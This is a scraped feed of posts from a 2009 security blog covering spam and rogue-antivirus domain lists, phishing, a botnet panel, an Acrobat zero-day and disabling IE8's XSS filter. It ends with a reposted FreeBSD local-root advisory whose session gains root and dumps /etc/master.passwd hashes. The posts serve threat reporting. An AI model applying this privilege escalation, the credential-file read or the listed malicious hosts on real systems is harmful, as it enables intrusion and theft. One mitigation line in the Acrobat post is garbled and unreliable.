href="http://blog.trendmicro.com/news-on-brittany-murphy%e2%80%99s-death-lead-to-fakeav/">News on Brittany Murphy’s Death Lead to FAKEAV </a><br />McAfee - <a href="http://www.avertlabs.com/research/blog/index.php/2009/12/21/brittany-murphy-searching-dangers/">Brittany Murphy Searching Dangers</a><br /><br />Although whole worlds are in the Christmas mood, bad guys never stop to continue their making money nest. :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-8035851539137192781?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/8ncLdYpiruxmjbfpjw1SmssLfr8/0/da"><img src="http://feedads.g.doubleclick.net/~a/8ncLdYpiruxmjbfpjw1SmssLfr8/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/8ncLdYpiruxmjbfpjw1SmssLfr8/1/da"><img src="http://feedads.g.doubleclick.net/~a/8ncLdYpiruxmjbfpjw1SmssLfr8/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/brittany-murphys-death-seo-poisoning.htmltag:blogger.com,1999:blog-2992238913899645252.post-79691998520746792192009-12-21T03:52:00.000-08:002009-12-21T04:01:52.549-08:002009-12-21T04:01:52.549-08:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9hx2PUn7I/AAAAAAAAA4w/D01MeW5jukQ/s1600-h/viagadec.PNG"><img style="cursor: pointer; width: 320px; height: 196px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9hx2PUn7I/AAAAAAAAA4w/D01MeW5jukQ/s320/viagadec.PNG" alt="" id="BLOGGER_PHOTO_ID_5417656385751261106" border="0" /></a><br /><br />Spamming Links:<br /><br />http://www.zhdfght.com/<br />http://www.piyamcy.cn<br />http://prettymoral.com<br />http://www.ingobdue.cn<br />http://nvaecs.angelfire.com<br />http://ienroller.angelfire.com<br />http://www.iwxkugue.cn<br />http://e10bee.suyivoqiw.cn/<br />http://biznews7.org/news<br />http://cid-a97391e298c94785.spaces.live.com<br />http://f2a63275.wejowafob.cn/<br />http://6a38a4.zehaqomay.cn/<br />http://97305a2a71.sudugefon.cn/<br />http://c301d1b3f9f7.vasesomer.cn/<br />http://30319b.bitapacoh.cn/<br />http://50386a9.rihogagox.cn/<br />http://cid-3e4630a031e273ff.spaces.live.com/<br />http://www.rxultimatespell.com/<br />http://f62db.xamobejep.cn/<br />http://moonnake.net/<br />http://11knife.ru/<br />http://001c2f.bapunat.cn/<br />http://1a68d3b7.hiyusev.cn/<br />http://now.to/5xt7<br />http://e5c8.cohuzkp.cn/<br />http://7e5629c7.jisurim.cn/<br />http://1680.cevupxn.cn/<br />http://bca.vocimtf.cn/<br />http://www.pharmlorens61.cn/<br />http://284c62d3.tabuhhh.cn/<br />http://dfe6.cetitgv.cn/<br />http://oskjcjed.cn/<br />http://89a.yomepmm.cn/<br />http://55a1.qofezgk.cn/<br />http://www.goziywb.cn/<br />http://fd78.yiruxgl.cn/<br />http://zokxfde.cn/<br />http://c3ceea7bf5.huweynf.cn/<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9iU9N0CAI/AAAAAAAAA44/ojsmEL4P1QY/s1600-h/Adobepromo.PNG"><img style="cursor: pointer; width: 320px; height: 206px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9iU9N0CAI/AAAAAAAAA44/ojsmEL4P1QY/s320/Adobepromo.PNG" alt="" id="BLOGGER_PHOTO_ID_5417656988919400450" border="0" /></a><br /><br />http://kloperesofes.net/<br />http://sruisorehoes.net/<br />http://koperdinoses.com/<br />http://xirobenasoes.com/<br /><a bitly="BITLY_PROCESSED" title="ns for kloperesofes.net" href="http://www.robtex.com/dns/ns3.ziopraventoes.com.html"></a>http://ziopraventoes.com/<br />http://irgalometrices.com/<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-7969199852074679219?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/nvjxt-Gly8poDD2d5ofieVuZ54c/0/da"><img src="http://feedads.g.doubleclick.net/~a/nvjxt-Gly8poDD2d5ofieVuZ54c/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/nvjxt-Gly8poDD2d5ofieVuZ54c/1/da"><img src="http://feedads.g.doubleclick.net/~a/nvjxt-Gly8poDD2d5ofieVuZ54c/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/viagra-eurosoft-promotion-spamming-for.htmltag:blogger.com,1999:blog-2992238913899645252.post-20822023903378768482009-12-21T03:34:00.000-08:002009-12-21T03:37:39.008-08:002009-12-21T03:37:39.008-08:00Just update, do you guys received tons of spam email regarding "FuckBook Invite #xxxxxx" ? I do received lots of similar messages.<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9dvTE-xWI/AAAAAAAAA4o/qF-vz-Uq6ao/s1600-h/fuckbook.PNG"><img style="cursor: pointer; width: 320px; height: 125px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sy9dvTE-xWI/AAAAAAAAA4o/qF-vz-Uq6ao/s320/fuckbook.PNG" alt="" id="BLOGGER_PHOTO_ID_5417651943906395490" border="0" /></a><br /><br />Suspicious links:<br /><br />http://nvaecs.angelfire.com<br />http://ienroller.angelfire.com<br />http://pcfreehost.tripod.com<br />http://ecbrowse.tripod.com<br />http://quickreviews.tripod.com<br />http://stupsihasi.tripod.com<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-2082202390337876848?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/YbfNKNAV_YUdKeoIQ-KHt4NGaSw/0/da"><img src="http://feedads.g.doubleclick.net/~a/YbfNKNAV_YUdKeoIQ-KHt4NGaSw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/YbfNKNAV_YUdKeoIQ-KHt4NGaSw/1/da"><img src="http://feedads.g.doubleclick.net/~a/YbfNKNAV_YUdKeoIQ-KHt4NGaSw/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/fuckbook-invitation-in-email.htmltag:blogger.com,1999:blog-2992238913899645252.post-5816262439234823202009-12-17T07:03:00.000-08:002009-12-17T07:33:54.858-08:002009-12-17T07:33:54.858-08:00Since last week, Acrobat Zero-Day created lots attention to security industry and official vendor patch only available by next year 12 Jan 2010.<br /><br />According to <a href="http://www.net-security.org/secworld.php?id=8628">Net-Security</a>, Adobe applications top the list of four applications identified in US NIST.<br /><br />Metasploit Framework add this Zero Day exploit in their latest database.<br /><a href="http://downloads.securityfocus.com/vulnerabilities/exploits/adobe_media_newplayer.rb">http://downloads.securityfocus.com/vulnerabilities/exploits/adobe_media_newplayer.rb</a><br /><br />Malicious PDF files crafted with this Zero-Day exploit are in wilds. So as usual, I recommend everyone to be more extra vigilant when receiving PDF files through internet.<br /><br />Temporary solution for Adobe Reader either one<br />- Disable the "<span style="font-weight: bold;">Disable JavaScript</span>" features in your Adobe Reader.<br />- Edit registry (.reg) file<br /><pre>[HKEY_CLASSES_ROOT\AcroExch.Document.7]<br />"EditFlags"=hex:00,00,00,00</pre><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_N2xP0b-ECBo/SypOzR6akPI/AAAAAAAAA4g/Rrg5gWvffEU/s1600-h/pdf-temsolution.PNG"><img style="cursor: pointer; width: 320px; height: 188px;" src="http://4.bp.blogspot.com/_N2xP0b-ECBo/SypOzR6akPI/AAAAAAAAA4g/Rrg5gWvffEU/s320/pdf-temsolution.PNG" alt="" id="BLOGGER_PHOTO_ID_5416228144755151090" border="0" /></a><br /><br />- Seek for alternative PDF reader that available in market.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-581626243923482320?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/-Djg9YJLZU9VrjBEc8sMkvww0qY/0/da"><img src="http://feedads.g.doubleclick.net/~a/-Djg9YJLZU9VrjBEc8sMkvww0qY/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/-Djg9YJLZU9VrjBEc8sMkvww0qY/1/da"><img src="http://feedads.g.doubleclick.net/~a/-Djg9YJLZU9VrjBEc8sMkvww0qY/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/acrobat-zero-day-medianewplayernull-cve.htmltag:blogger.com,1999:blog-2992238913899645252.post-9090774507207380852009-12-17T06:06:00.001-08:002009-12-17T06:11:57.834-08:002009-12-17T06:11:57.834-08:00Browsing to link hxxxp://pc-scanner2010.com will prompt out scare message that trick users to download the rogue AntiVirus.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_N2xP0b-ECBo/Syo682XfCGI/AAAAAAAAA4Y/MyuKAWNG7Ko/s1600-h/prompt.PNG"><img style="cursor: pointer; width: 320px; height: 52px;" src="http://3.bp.blogspot.com/_N2xP0b-ECBo/Syo682XfCGI/AAAAAAAAA4Y/MyuKAWNG7Ko/s320/prompt.PNG" alt="" id="BLOGGER_PHOTO_ID_5416206318927022178" border="0" /></a><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/Syo68wba-fI/AAAAAAAAA4Q/6ZvU05kdUgE/s1600-h/pcscanner.PNG"><img style="cursor: pointer; width: 320px; height: 279px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/Syo68wba-fI/AAAAAAAAA4Q/6ZvU05kdUgE/s320/pcscanner.PNG" alt="" id="BLOGGER_PHOTO_ID_5416206317332920818" border="0" /></a><br /><br />hxxxp://advanced-virusremover-2010.com<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/Syo68RJgJmI/AAAAAAAAA4I/MP048wey0ms/s1600-h/advanceremover.PNG"><img style="cursor: pointer; width: 320px; height: 252px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/Syo68RJgJmI/AAAAAAAAA4I/MP048wey0ms/s320/advanceremover.PNG" alt="" id="BLOGGER_PHOTO_ID_5416206308936263266" border="0" /></a><br /><br />IP address: <span style="font-weight: bold;">193.104.110.50</span><br /><br />advanced-virus-remover-2009.com<br />advanced-virusremover-2010.com<br />advanced-virusremover2009.com<br />avrdownnew5.com<br />avrdownnew6.com<br />avrdownnew7.com<br />avrdownnew8.com<br />avrdownnew9.com<br />buy-internet-security2010.com<br />buy-internetsecurity2010.com<br />downloadavr13.com<br />greatcrypt.com<br />mail.avrdownnew9.com<br />mail.buy-internet-security2010.com<br />mail.buy-internetsecurity2010.com<br />mail.masterhost.co.in<br />mail.pc-scanner-2011.biz<br />mail.pc-scanner-2012.net<br />mail.pc-scanner2010.com<br />masterhost.co.in<br />ns1.masterhost.co.in<br />pc-scanner-2011.biz<br />pc-scanner-2012.net<br />pc-scanner2010.com<br />vsproject.net<br />www.advanced-virus-remover-2009.com<br />xxx-white-tube.net<br /><br />IP Address: <span style="font-weight: bold;">91.207.116.55</span><br /><br />10-open-davinci.com<br />advancedvirus-remover-2010.com<br />advancedvirusremover-2009.com<br />best-scan-pc.biz<br />best-scan-pc.com<br />best-scan.com<br />best-scanpc.com<br />best-scanpc.net<br />best-scanpc.org<br />coolcount2.com<br />downloadavr6.com<br />downloadavr8.com<br />hard-xxx-tube.com<br />mail.10-open-davinci.com<br />mail.advanced-virus-remover-2009.com<br />mail.advanced-virus-remover2010.com<br />mail.advanced-virusremover-2010.com<br />mail.advanced-virusremover2009.com<br />mail.advancedvirus-remover-2010.com<br />mail.advancedvirusremover-2009.com<br />mail.best-scan-pc.com<br />mail.best-scan-pc.net<br />mail.best-scan.com<br />mail.best-scan.net<br />mail.best-scanpc.org<br />mail.cathrynzfunz.com<br />mail.coolcount1.com<br />mail.downloadavr6.com<br />mail.downloadavr7.com<br />mail.downloadavr8.com<br />mail.greatcrypt.com<br />mail.hard-xxx-tube.com<br />mail.testavrdown.com<br />mail.testavrdownnew.com<br />mail.vscodec-pro.net<br />mail.vsproject.net<br />mail.xxx-white-tube.net<br />mail.xxx-white-tube.org<br />testavrdownnew.com<br />vscodec-pro.net<br />white-xxx-tube.com<br />www.advancedvirus-remover2009.com<br />www.advancedvirusremover-2009.com<br />www.best-scan-pc.com<br />www.best-scanpc.net<br />www.best-scanpc.org<br />www.hard-xxx-tube.com<br />www.onlinescanxppro.com<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-909077450720738085?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/Zt1bortTMG3fFSMp0hdZjLeJZE8/0/da"><img src="http://feedads.g.doubleclick.net/~a/Zt1bortTMG3fFSMp0hdZjLeJZE8/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/Zt1bortTMG3fFSMp0hdZjLeJZE8/1/da"><img src="http://feedads.g.doubleclick.net/~a/Zt1bortTMG3fFSMp0hdZjLeJZE8/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/rogue-antivirus-advanced-virus-remover.htmltag:blogger.com,1999:blog-2992238913899645252.post-61759480182963922472009-12-16T04:30:00.000-08:002009-12-16T04:59:08.693-08:002009-12-16T04:59:08.693-08:00Recently found one of the believed is FIESTA control panel kits showed the victims mainly from Vietnam and India, although the scale of infected systems small compare to other Zeus, Rustock and etc. Strongly believed that this control panel kits just tip of iceberg within "botnet" families.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyjWW064lTI/AAAAAAAAA34/LC1PEUlPSqY/s1600-h/FIESta00.png"><img style="cursor: pointer; width: 251px; height: 320px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyjWW064lTI/AAAAAAAAA34/LC1PEUlPSqY/s320/FIESta00.png" alt="" id="BLOGGER_PHOTO_ID_5415814239564109106" border="0" /></a><br /><br />From figure 1, I can make summarized that XP "SP1" are dominance of the victims systems compare to Vista, SP2, 2k and 2k3. There have not surprising that lots of internet users are using SP1 although SP2 and SP3 released few years ago.<br /><br />Among the infected systems, Firefox browser lead among other browsers used to surf internet. <br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_N2xP0b-ECBo/SyjWXDOQeJI/AAAAAAAAA4A/5P2q-NBSzHQ/s1600-h/FIESta01.png"><img style="cursor: pointer; width: 270px; height: 320px;" src="http://3.bp.blogspot.com/_N2xP0b-ECBo/SyjWXDOQeJI/AAAAAAAAA4A/5P2q-NBSzHQ/s320/FIESta01.png" alt="" id="BLOGGER_PHOTO_ID_5415814243403462802" border="0" /></a><br /><br />Figure 2 showed list of the possible"Luckysploits" exploits attempts on victims systems, consist of COM, MDAC, XML Parsing, Snapshot, WFI, PDF, VML2, FF behavior and NCT.<br /><br />The downloaded executable file gain minor rate from Virustotal, and ThreatExpert reports can be review at <a href="http://www.threatexpert.com/report.aspx?md5=0095da1c241cb9056b67425dab3d7283">http://www.threatexpert.com/report.aspx?md5=0095da1c241cb9056b67425dab3d7283</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-6175948018296392247?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/vwJLVrIjfSIQrxopfMBC3OcN2vk/0/da"><img src="http://feedads.g.doubleclick.net/~a/vwJLVrIjfSIQrxopfMBC3OcN2vk/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/vwJLVrIjfSIQrxopfMBC3OcN2vk/1/da"><img src="http://feedads.g.doubleclick.net/~a/vwJLVrIjfSIQrxopfMBC3OcN2vk/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/fiesta-botnet-dominance-at-vietnam-and.htmltag:blogger.com,1999:blog-2992238913899645252.post-51085904039747659452009-12-14T05:35:00.000-08:002010-01-21T02:35:35.279-08:002010-01-21T02:35:35.279-08:00Internet Security 2010 is another phony security software that look similar to legitimate security software.<br /><br />Rogue software usually use scare tactics that trick users with false warnings and alert users to buy the product.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_N2xP0b-ECBo/SyZATEA62FI/AAAAAAAAA3k/Va_Vssascao/s1600-h/av2010.PNG"><img style="cursor: pointer; width: 320px; height: 180px;" src="http://3.bp.blogspot.com/_N2xP0b-ECBo/SyZATEA62FI/AAAAAAAAA3k/Va_Vssascao/s320/av2010.PNG" alt="" id="BLOGGER_PHOTO_ID_5415086298198890578" border="0" /></a><br /><br />Installer "IS2010.exe"<br />File<br />MD5: 0x3199C032F173066DD0E9DB1E7D3C2F67<br />SHA-1: 0x761B2E2C291527196B920CFD29480422854CD523<br /><div id=":j4" class="ii gt"> File size: 1,414,656 bytes</div><br /><br />http://www.threatexpert.com/report.aspx?md5=3199c032f173066dd0e9db1e7d3c2f67<br /><br />Another rogue security software website that share same IP address with "Internet Security 2010"<br /><br />Below is the screenshot that copy-exactly from the legitimate CleanMyPC Registry Cleaner.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/SyZATSV3PDI/AAAAAAAAA3s/5DUxcKBY59Q/s1600-h/cleanmypc.PNG"><img style="cursor: pointer; width: 287px; height: 320px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/SyZATSV3PDI/AAAAAAAAA3s/5DUxcKBY59Q/s320/cleanmypc.PNG" alt="" id="BLOGGER_PHOTO_ID_5415086302044830770" border="0" /></a><br /><br />The legitimate website is <a href="http://www.registry-cleaner.net/">http://www.registry-cleaner.net/</a> with IP <span class="ipaddr">66.39.16.135 </span>. Be aware if the incorrect web link appear in browser address bar.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-5108590403974765945?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/l7q8BmjLnyJY3D5B4hk_30tdgc8/0/da"><img src="http://feedads.g.doubleclick.net/~a/l7q8BmjLnyJY3D5B4hk_30tdgc8/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/l7q8BmjLnyJY3D5B4hk_30tdgc8/1/da"><img src="http://feedads.g.doubleclick.net/~a/l7q8BmjLnyJY3D5B4hk_30tdgc8/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/rogue-antivirus-internet-security-2010.htmltag:blogger.com,1999:blog-2992238913899645252.post-62387333201948106242009-12-14T05:16:00.000-08:002009-12-14T05:34:13.546-08:002009-12-14T05:34:13.546-08:00Be caution when you login to the famous social networking portal "Facebook" like figure below, if you noticed the address bar carefully, actually it's a Facebook phishing site.<br /><br />Figure 2 showed that the username and password used to login the Facebook. Several accounts were recorded in that fake "Facebook".<br /><br />If you suspect your Facebook account was compromised, immediately change the password at the first place.<br /><br />Figure1:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyY8Tjzr9QI/AAAAAAAAA3U/Ynm9yZ0VqX8/s1600-h/fb.PNG"><img style="cursor: pointer; width: 320px; height: 150px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyY8Tjzr9QI/AAAAAAAAA3U/Ynm9yZ0VqX8/s320/fb.PNG" alt="" id="BLOGGER_PHOTO_ID_5415081908686812418" border="0" /></a><br /><br />Figure2:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyY8T5rajWI/AAAAAAAAA3c/ryXBBgVRn9c/s1600-h/passwd-edit.PNG"><img style="cursor: pointer; width: 320px; height: 209px;" src="http://2.bp.blogspot.com/_N2xP0b-ECBo/SyY8T5rajWI/AAAAAAAAA3c/ryXBBgVRn9c/s320/passwd-edit.PNG" alt="" id="BLOGGER_PHOTO_ID_5415081914557697378" border="0" /></a><br /><br />IP address:<br /><span style="font-weight: bold;">66.45.237.212</span><br /><span style="font-weight: bold;">69.10.48.106</span><br /><br />Domains sharing same IP address:<br /><br />05748.t35.com<br />3sbe.t35.com<br />accessonlineupdate.t35.com<br />angelsaddiavolo.t35.com<br />anggit.t35.com<br />azitromed.t35.com<br />banameex-sesion.t35.com<br />banamex-netkey.t35.com<br />barnamex.t35.com<br />bizboost.t35.com<br />bizbooster.t35.com<br />bl-lit.t35.com<br />btrl24.t35.com<br />demo.t35.com<br />devilzone.t35.com<br />dkz1.t35.com<br />falilat.t35.com<br />finivest.t35.com<br />freeware-ad.t35.com<br />friends09.t35.com<br />ghhghg.t35.com<br />jadult.t35.com<br />meetsaferbuds.t35.com<br />montagemfotos.t35.com<br />noriko.t35.com<br />ns2.t35.com<br />ogard.t35.com<br />oijvhalaocp.t35.com<br />punjat.t35.com<br />raghil.t35.com<br />realestateprofiles.t35.com<br />saadullah.t35.com<br />spyware-re.t35.com<br />texas-accountpoker.t35.com<br />vital.t35.com<br />wachovlogsinfoonline.t35.com<br />www.azitromed.t35.com<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-6238733320194810624?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/DRxu-p7-24ZzL4ct91Odcuu7RTE/0/da"><img src="http://feedads.g.doubleclick.net/~a/DRxu-p7-24ZzL4ct91Odcuu7RTE/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/DRxu-p7-24ZzL4ct91Odcuu7RTE/1/da"><img src="http://feedads.g.doubleclick.net/~a/DRxu-p7-24ZzL4ct91Odcuu7RTE/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/phishing-fake-facebook.htmltag:blogger.com,1999:blog-2992238913899645252.post-43147743846487090362009-12-08T07:46:00.000-08:002009-12-08T07:55:46.080-08:002009-12-08T07:55:46.080-08:00As aware that we has option to turn-off XSS filter functionality in IE 8 (client side), we also have option to turn-off XSS functionality at Server side by adding under Http Header.<br /><br />PHP:<br />header("x-xss-Protection:0");<br /><br />ASP.net.config:<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sx52mTnr57I/AAAAAAAAA3M/iyrMMrfGhAM/s1600-h/asp.PNG"><img style="cursor: pointer; width: 320px; height: 200px;" src="http://1.bp.blogspot.com/_N2xP0b-ECBo/Sx52mTnr57I/AAAAAAAAA3M/iyrMMrfGhAM/s320/asp.PNG" alt="" id="BLOGGER_PHOTO_ID_5412894202619750322" border="0" /></a><br /><system.webserver><httpprotocol><customheaders><clear> <add name=" X-XSS-Protection" value="0"></add></clear></customheaders><br />reference: <a href="http://msdn.microsoft.com/zh-cn/library/dd565647%28en-us,VS.85%29.aspx">http://msdn.microsoft.com/zh-cn/library/dd565647(en-us,VS.85).aspx</a></httpprotocol></system.webserver><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2992238913899645252-4314774384648709036?l=www.web2secure.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/qTVXQsV6lrdpwHY0_4Gzvc0aqOM/0/da"><img src="http://feedads.g.doubleclick.net/~a/qTVXQsV6lrdpwHY0_4Gzvc0aqOM/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/qTVXQsV6lrdpwHY0_4Gzvc0aqOM/1/da"><img src="http://feedads.g.doubleclick.net/~a/qTVXQsV6lrdpwHY0_4Gzvc0aqOM/1/di" border="0" ismap="true"></img></a></p>secur065webhttp://www.blogger.com/profile/03927955797207814790noreply@blogger.com0http://www.web2secure.com/2009/12/close-ie-8-cross-site-scripting-xss.htmltag:blogger.com,1999:blog-2992238913899645252.post-53356162973512372052009-12-04T09:48:00.000-08:002009-12-04T09:52:14.205-08:002009-12-04T09:52:14.205-08:00Reference source: <a href="http://seclists.org/fulldisclosure/2009/Nov/371">http://seclists.org/fulldisclosure/2009/Nov/371</a><div><br /></div><div><br /></div><div><div>** FreeBSD local r00t 0day</div><div>Discovered &amp; Exploited by Nikolaos Rangos also known as Kingcope.</div><div>Nov 2009 "BiG TiME"</div><div><br /></div><div>"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg</div><div><br /></div><div>There is an unbelievable simple local r00t bug in recent FreeBSD versions.</div><div>I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.</div><div><br /></div><div>The bug resides in the Run-Time Link-Editor (rtld).</div><div>Normally rtld does not allow dangerous environment variables like LD_PRELOAD</div><div>to be set when executing setugid binaries like "ping" or "su".</div><div>With a rather simple technique rtld can be tricked into</div><div>accepting LD variables even on setugid binaries.</div><div>See the attached exploit for details.</div><div><br /></div><div>Example exploiting session</div><div>**********************************</div><div>%uname -a;id;</div><div>FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21</div><div>15:48:17 UTC 2009</div><div>root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386</div><div>uid=1001(kcope) gid=1001(users) groups=1001(users)</div><div>%./w00t.sh</div><div>FreeBSD local r00t zeroday</div><div>by Kingcope</div><div>November 2009</div><div>env.c: In function 'main':</div><div>env.c:5: warning: incompatible implicit declaration of built-in</div><div>function 'malloc'</div><div>env.c:9: warning: incompatible implicit declaration of built-in</div><div>function 'strcpy'</div><div>env.c:11: warning: incompatible implicit declaration of built-in</div><div>function 'execl'</div><div>/libexec/ld-elf.so.1: environment corrupt; missing value for</div><div>/libexec/ld-elf.so.1: environment corrupt; missing value for</div><div>/libexec/ld-elf.so.1: environment corrupt; missing value for</div><div>/libexec/ld-elf.so.1: environment corrupt; missing value for</div><div>/libexec/ld-elf.so.1: environment corrupt; missing value for</div><div>/libexec/ld-elf.so.1: environment corrupt; missing value for</div><div>ALEX-ALEX</div><div># uname -a;id;</div><div>FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21</div><div>15:48:17 UTC 2009</div><div>root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386</div><div>uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)</div><div># cat /etc/master.passwd</div><div># $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29</div><div>kensmith Exp $</div><div>#</div><div>root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &amp;:/root:/bin/csh</div><div>toor:*:0:0::0:0:Bourne-again Superuser:/root:</div><div>daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin</div><div>operator:*:2:5::0:0:System &amp;:/:/usr/sbin/nologin</div><div>bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin</div><div>tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin</div><div>kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin</div><div>games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin</div><div>news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin</div><div>man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin</div><div>sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin</div><div>smmsp:*:25:25::0:0:Sendmail Submission</div><div>User:/var/spool/clientmqueue:/usr/sbin/nologin</div><div>mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin</div><div>bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin</div><div>proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin</div><div>_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin</div><div>_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin</div><div>uucp:*:66:66::0:0:UUCP</div><div>pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico</div><div>pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin</div><div>www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin</div><div>nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin</div><div>kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User</div><div>&amp;:/home/kcope:/bin/sh</div><div>#</div><div><div>Systems 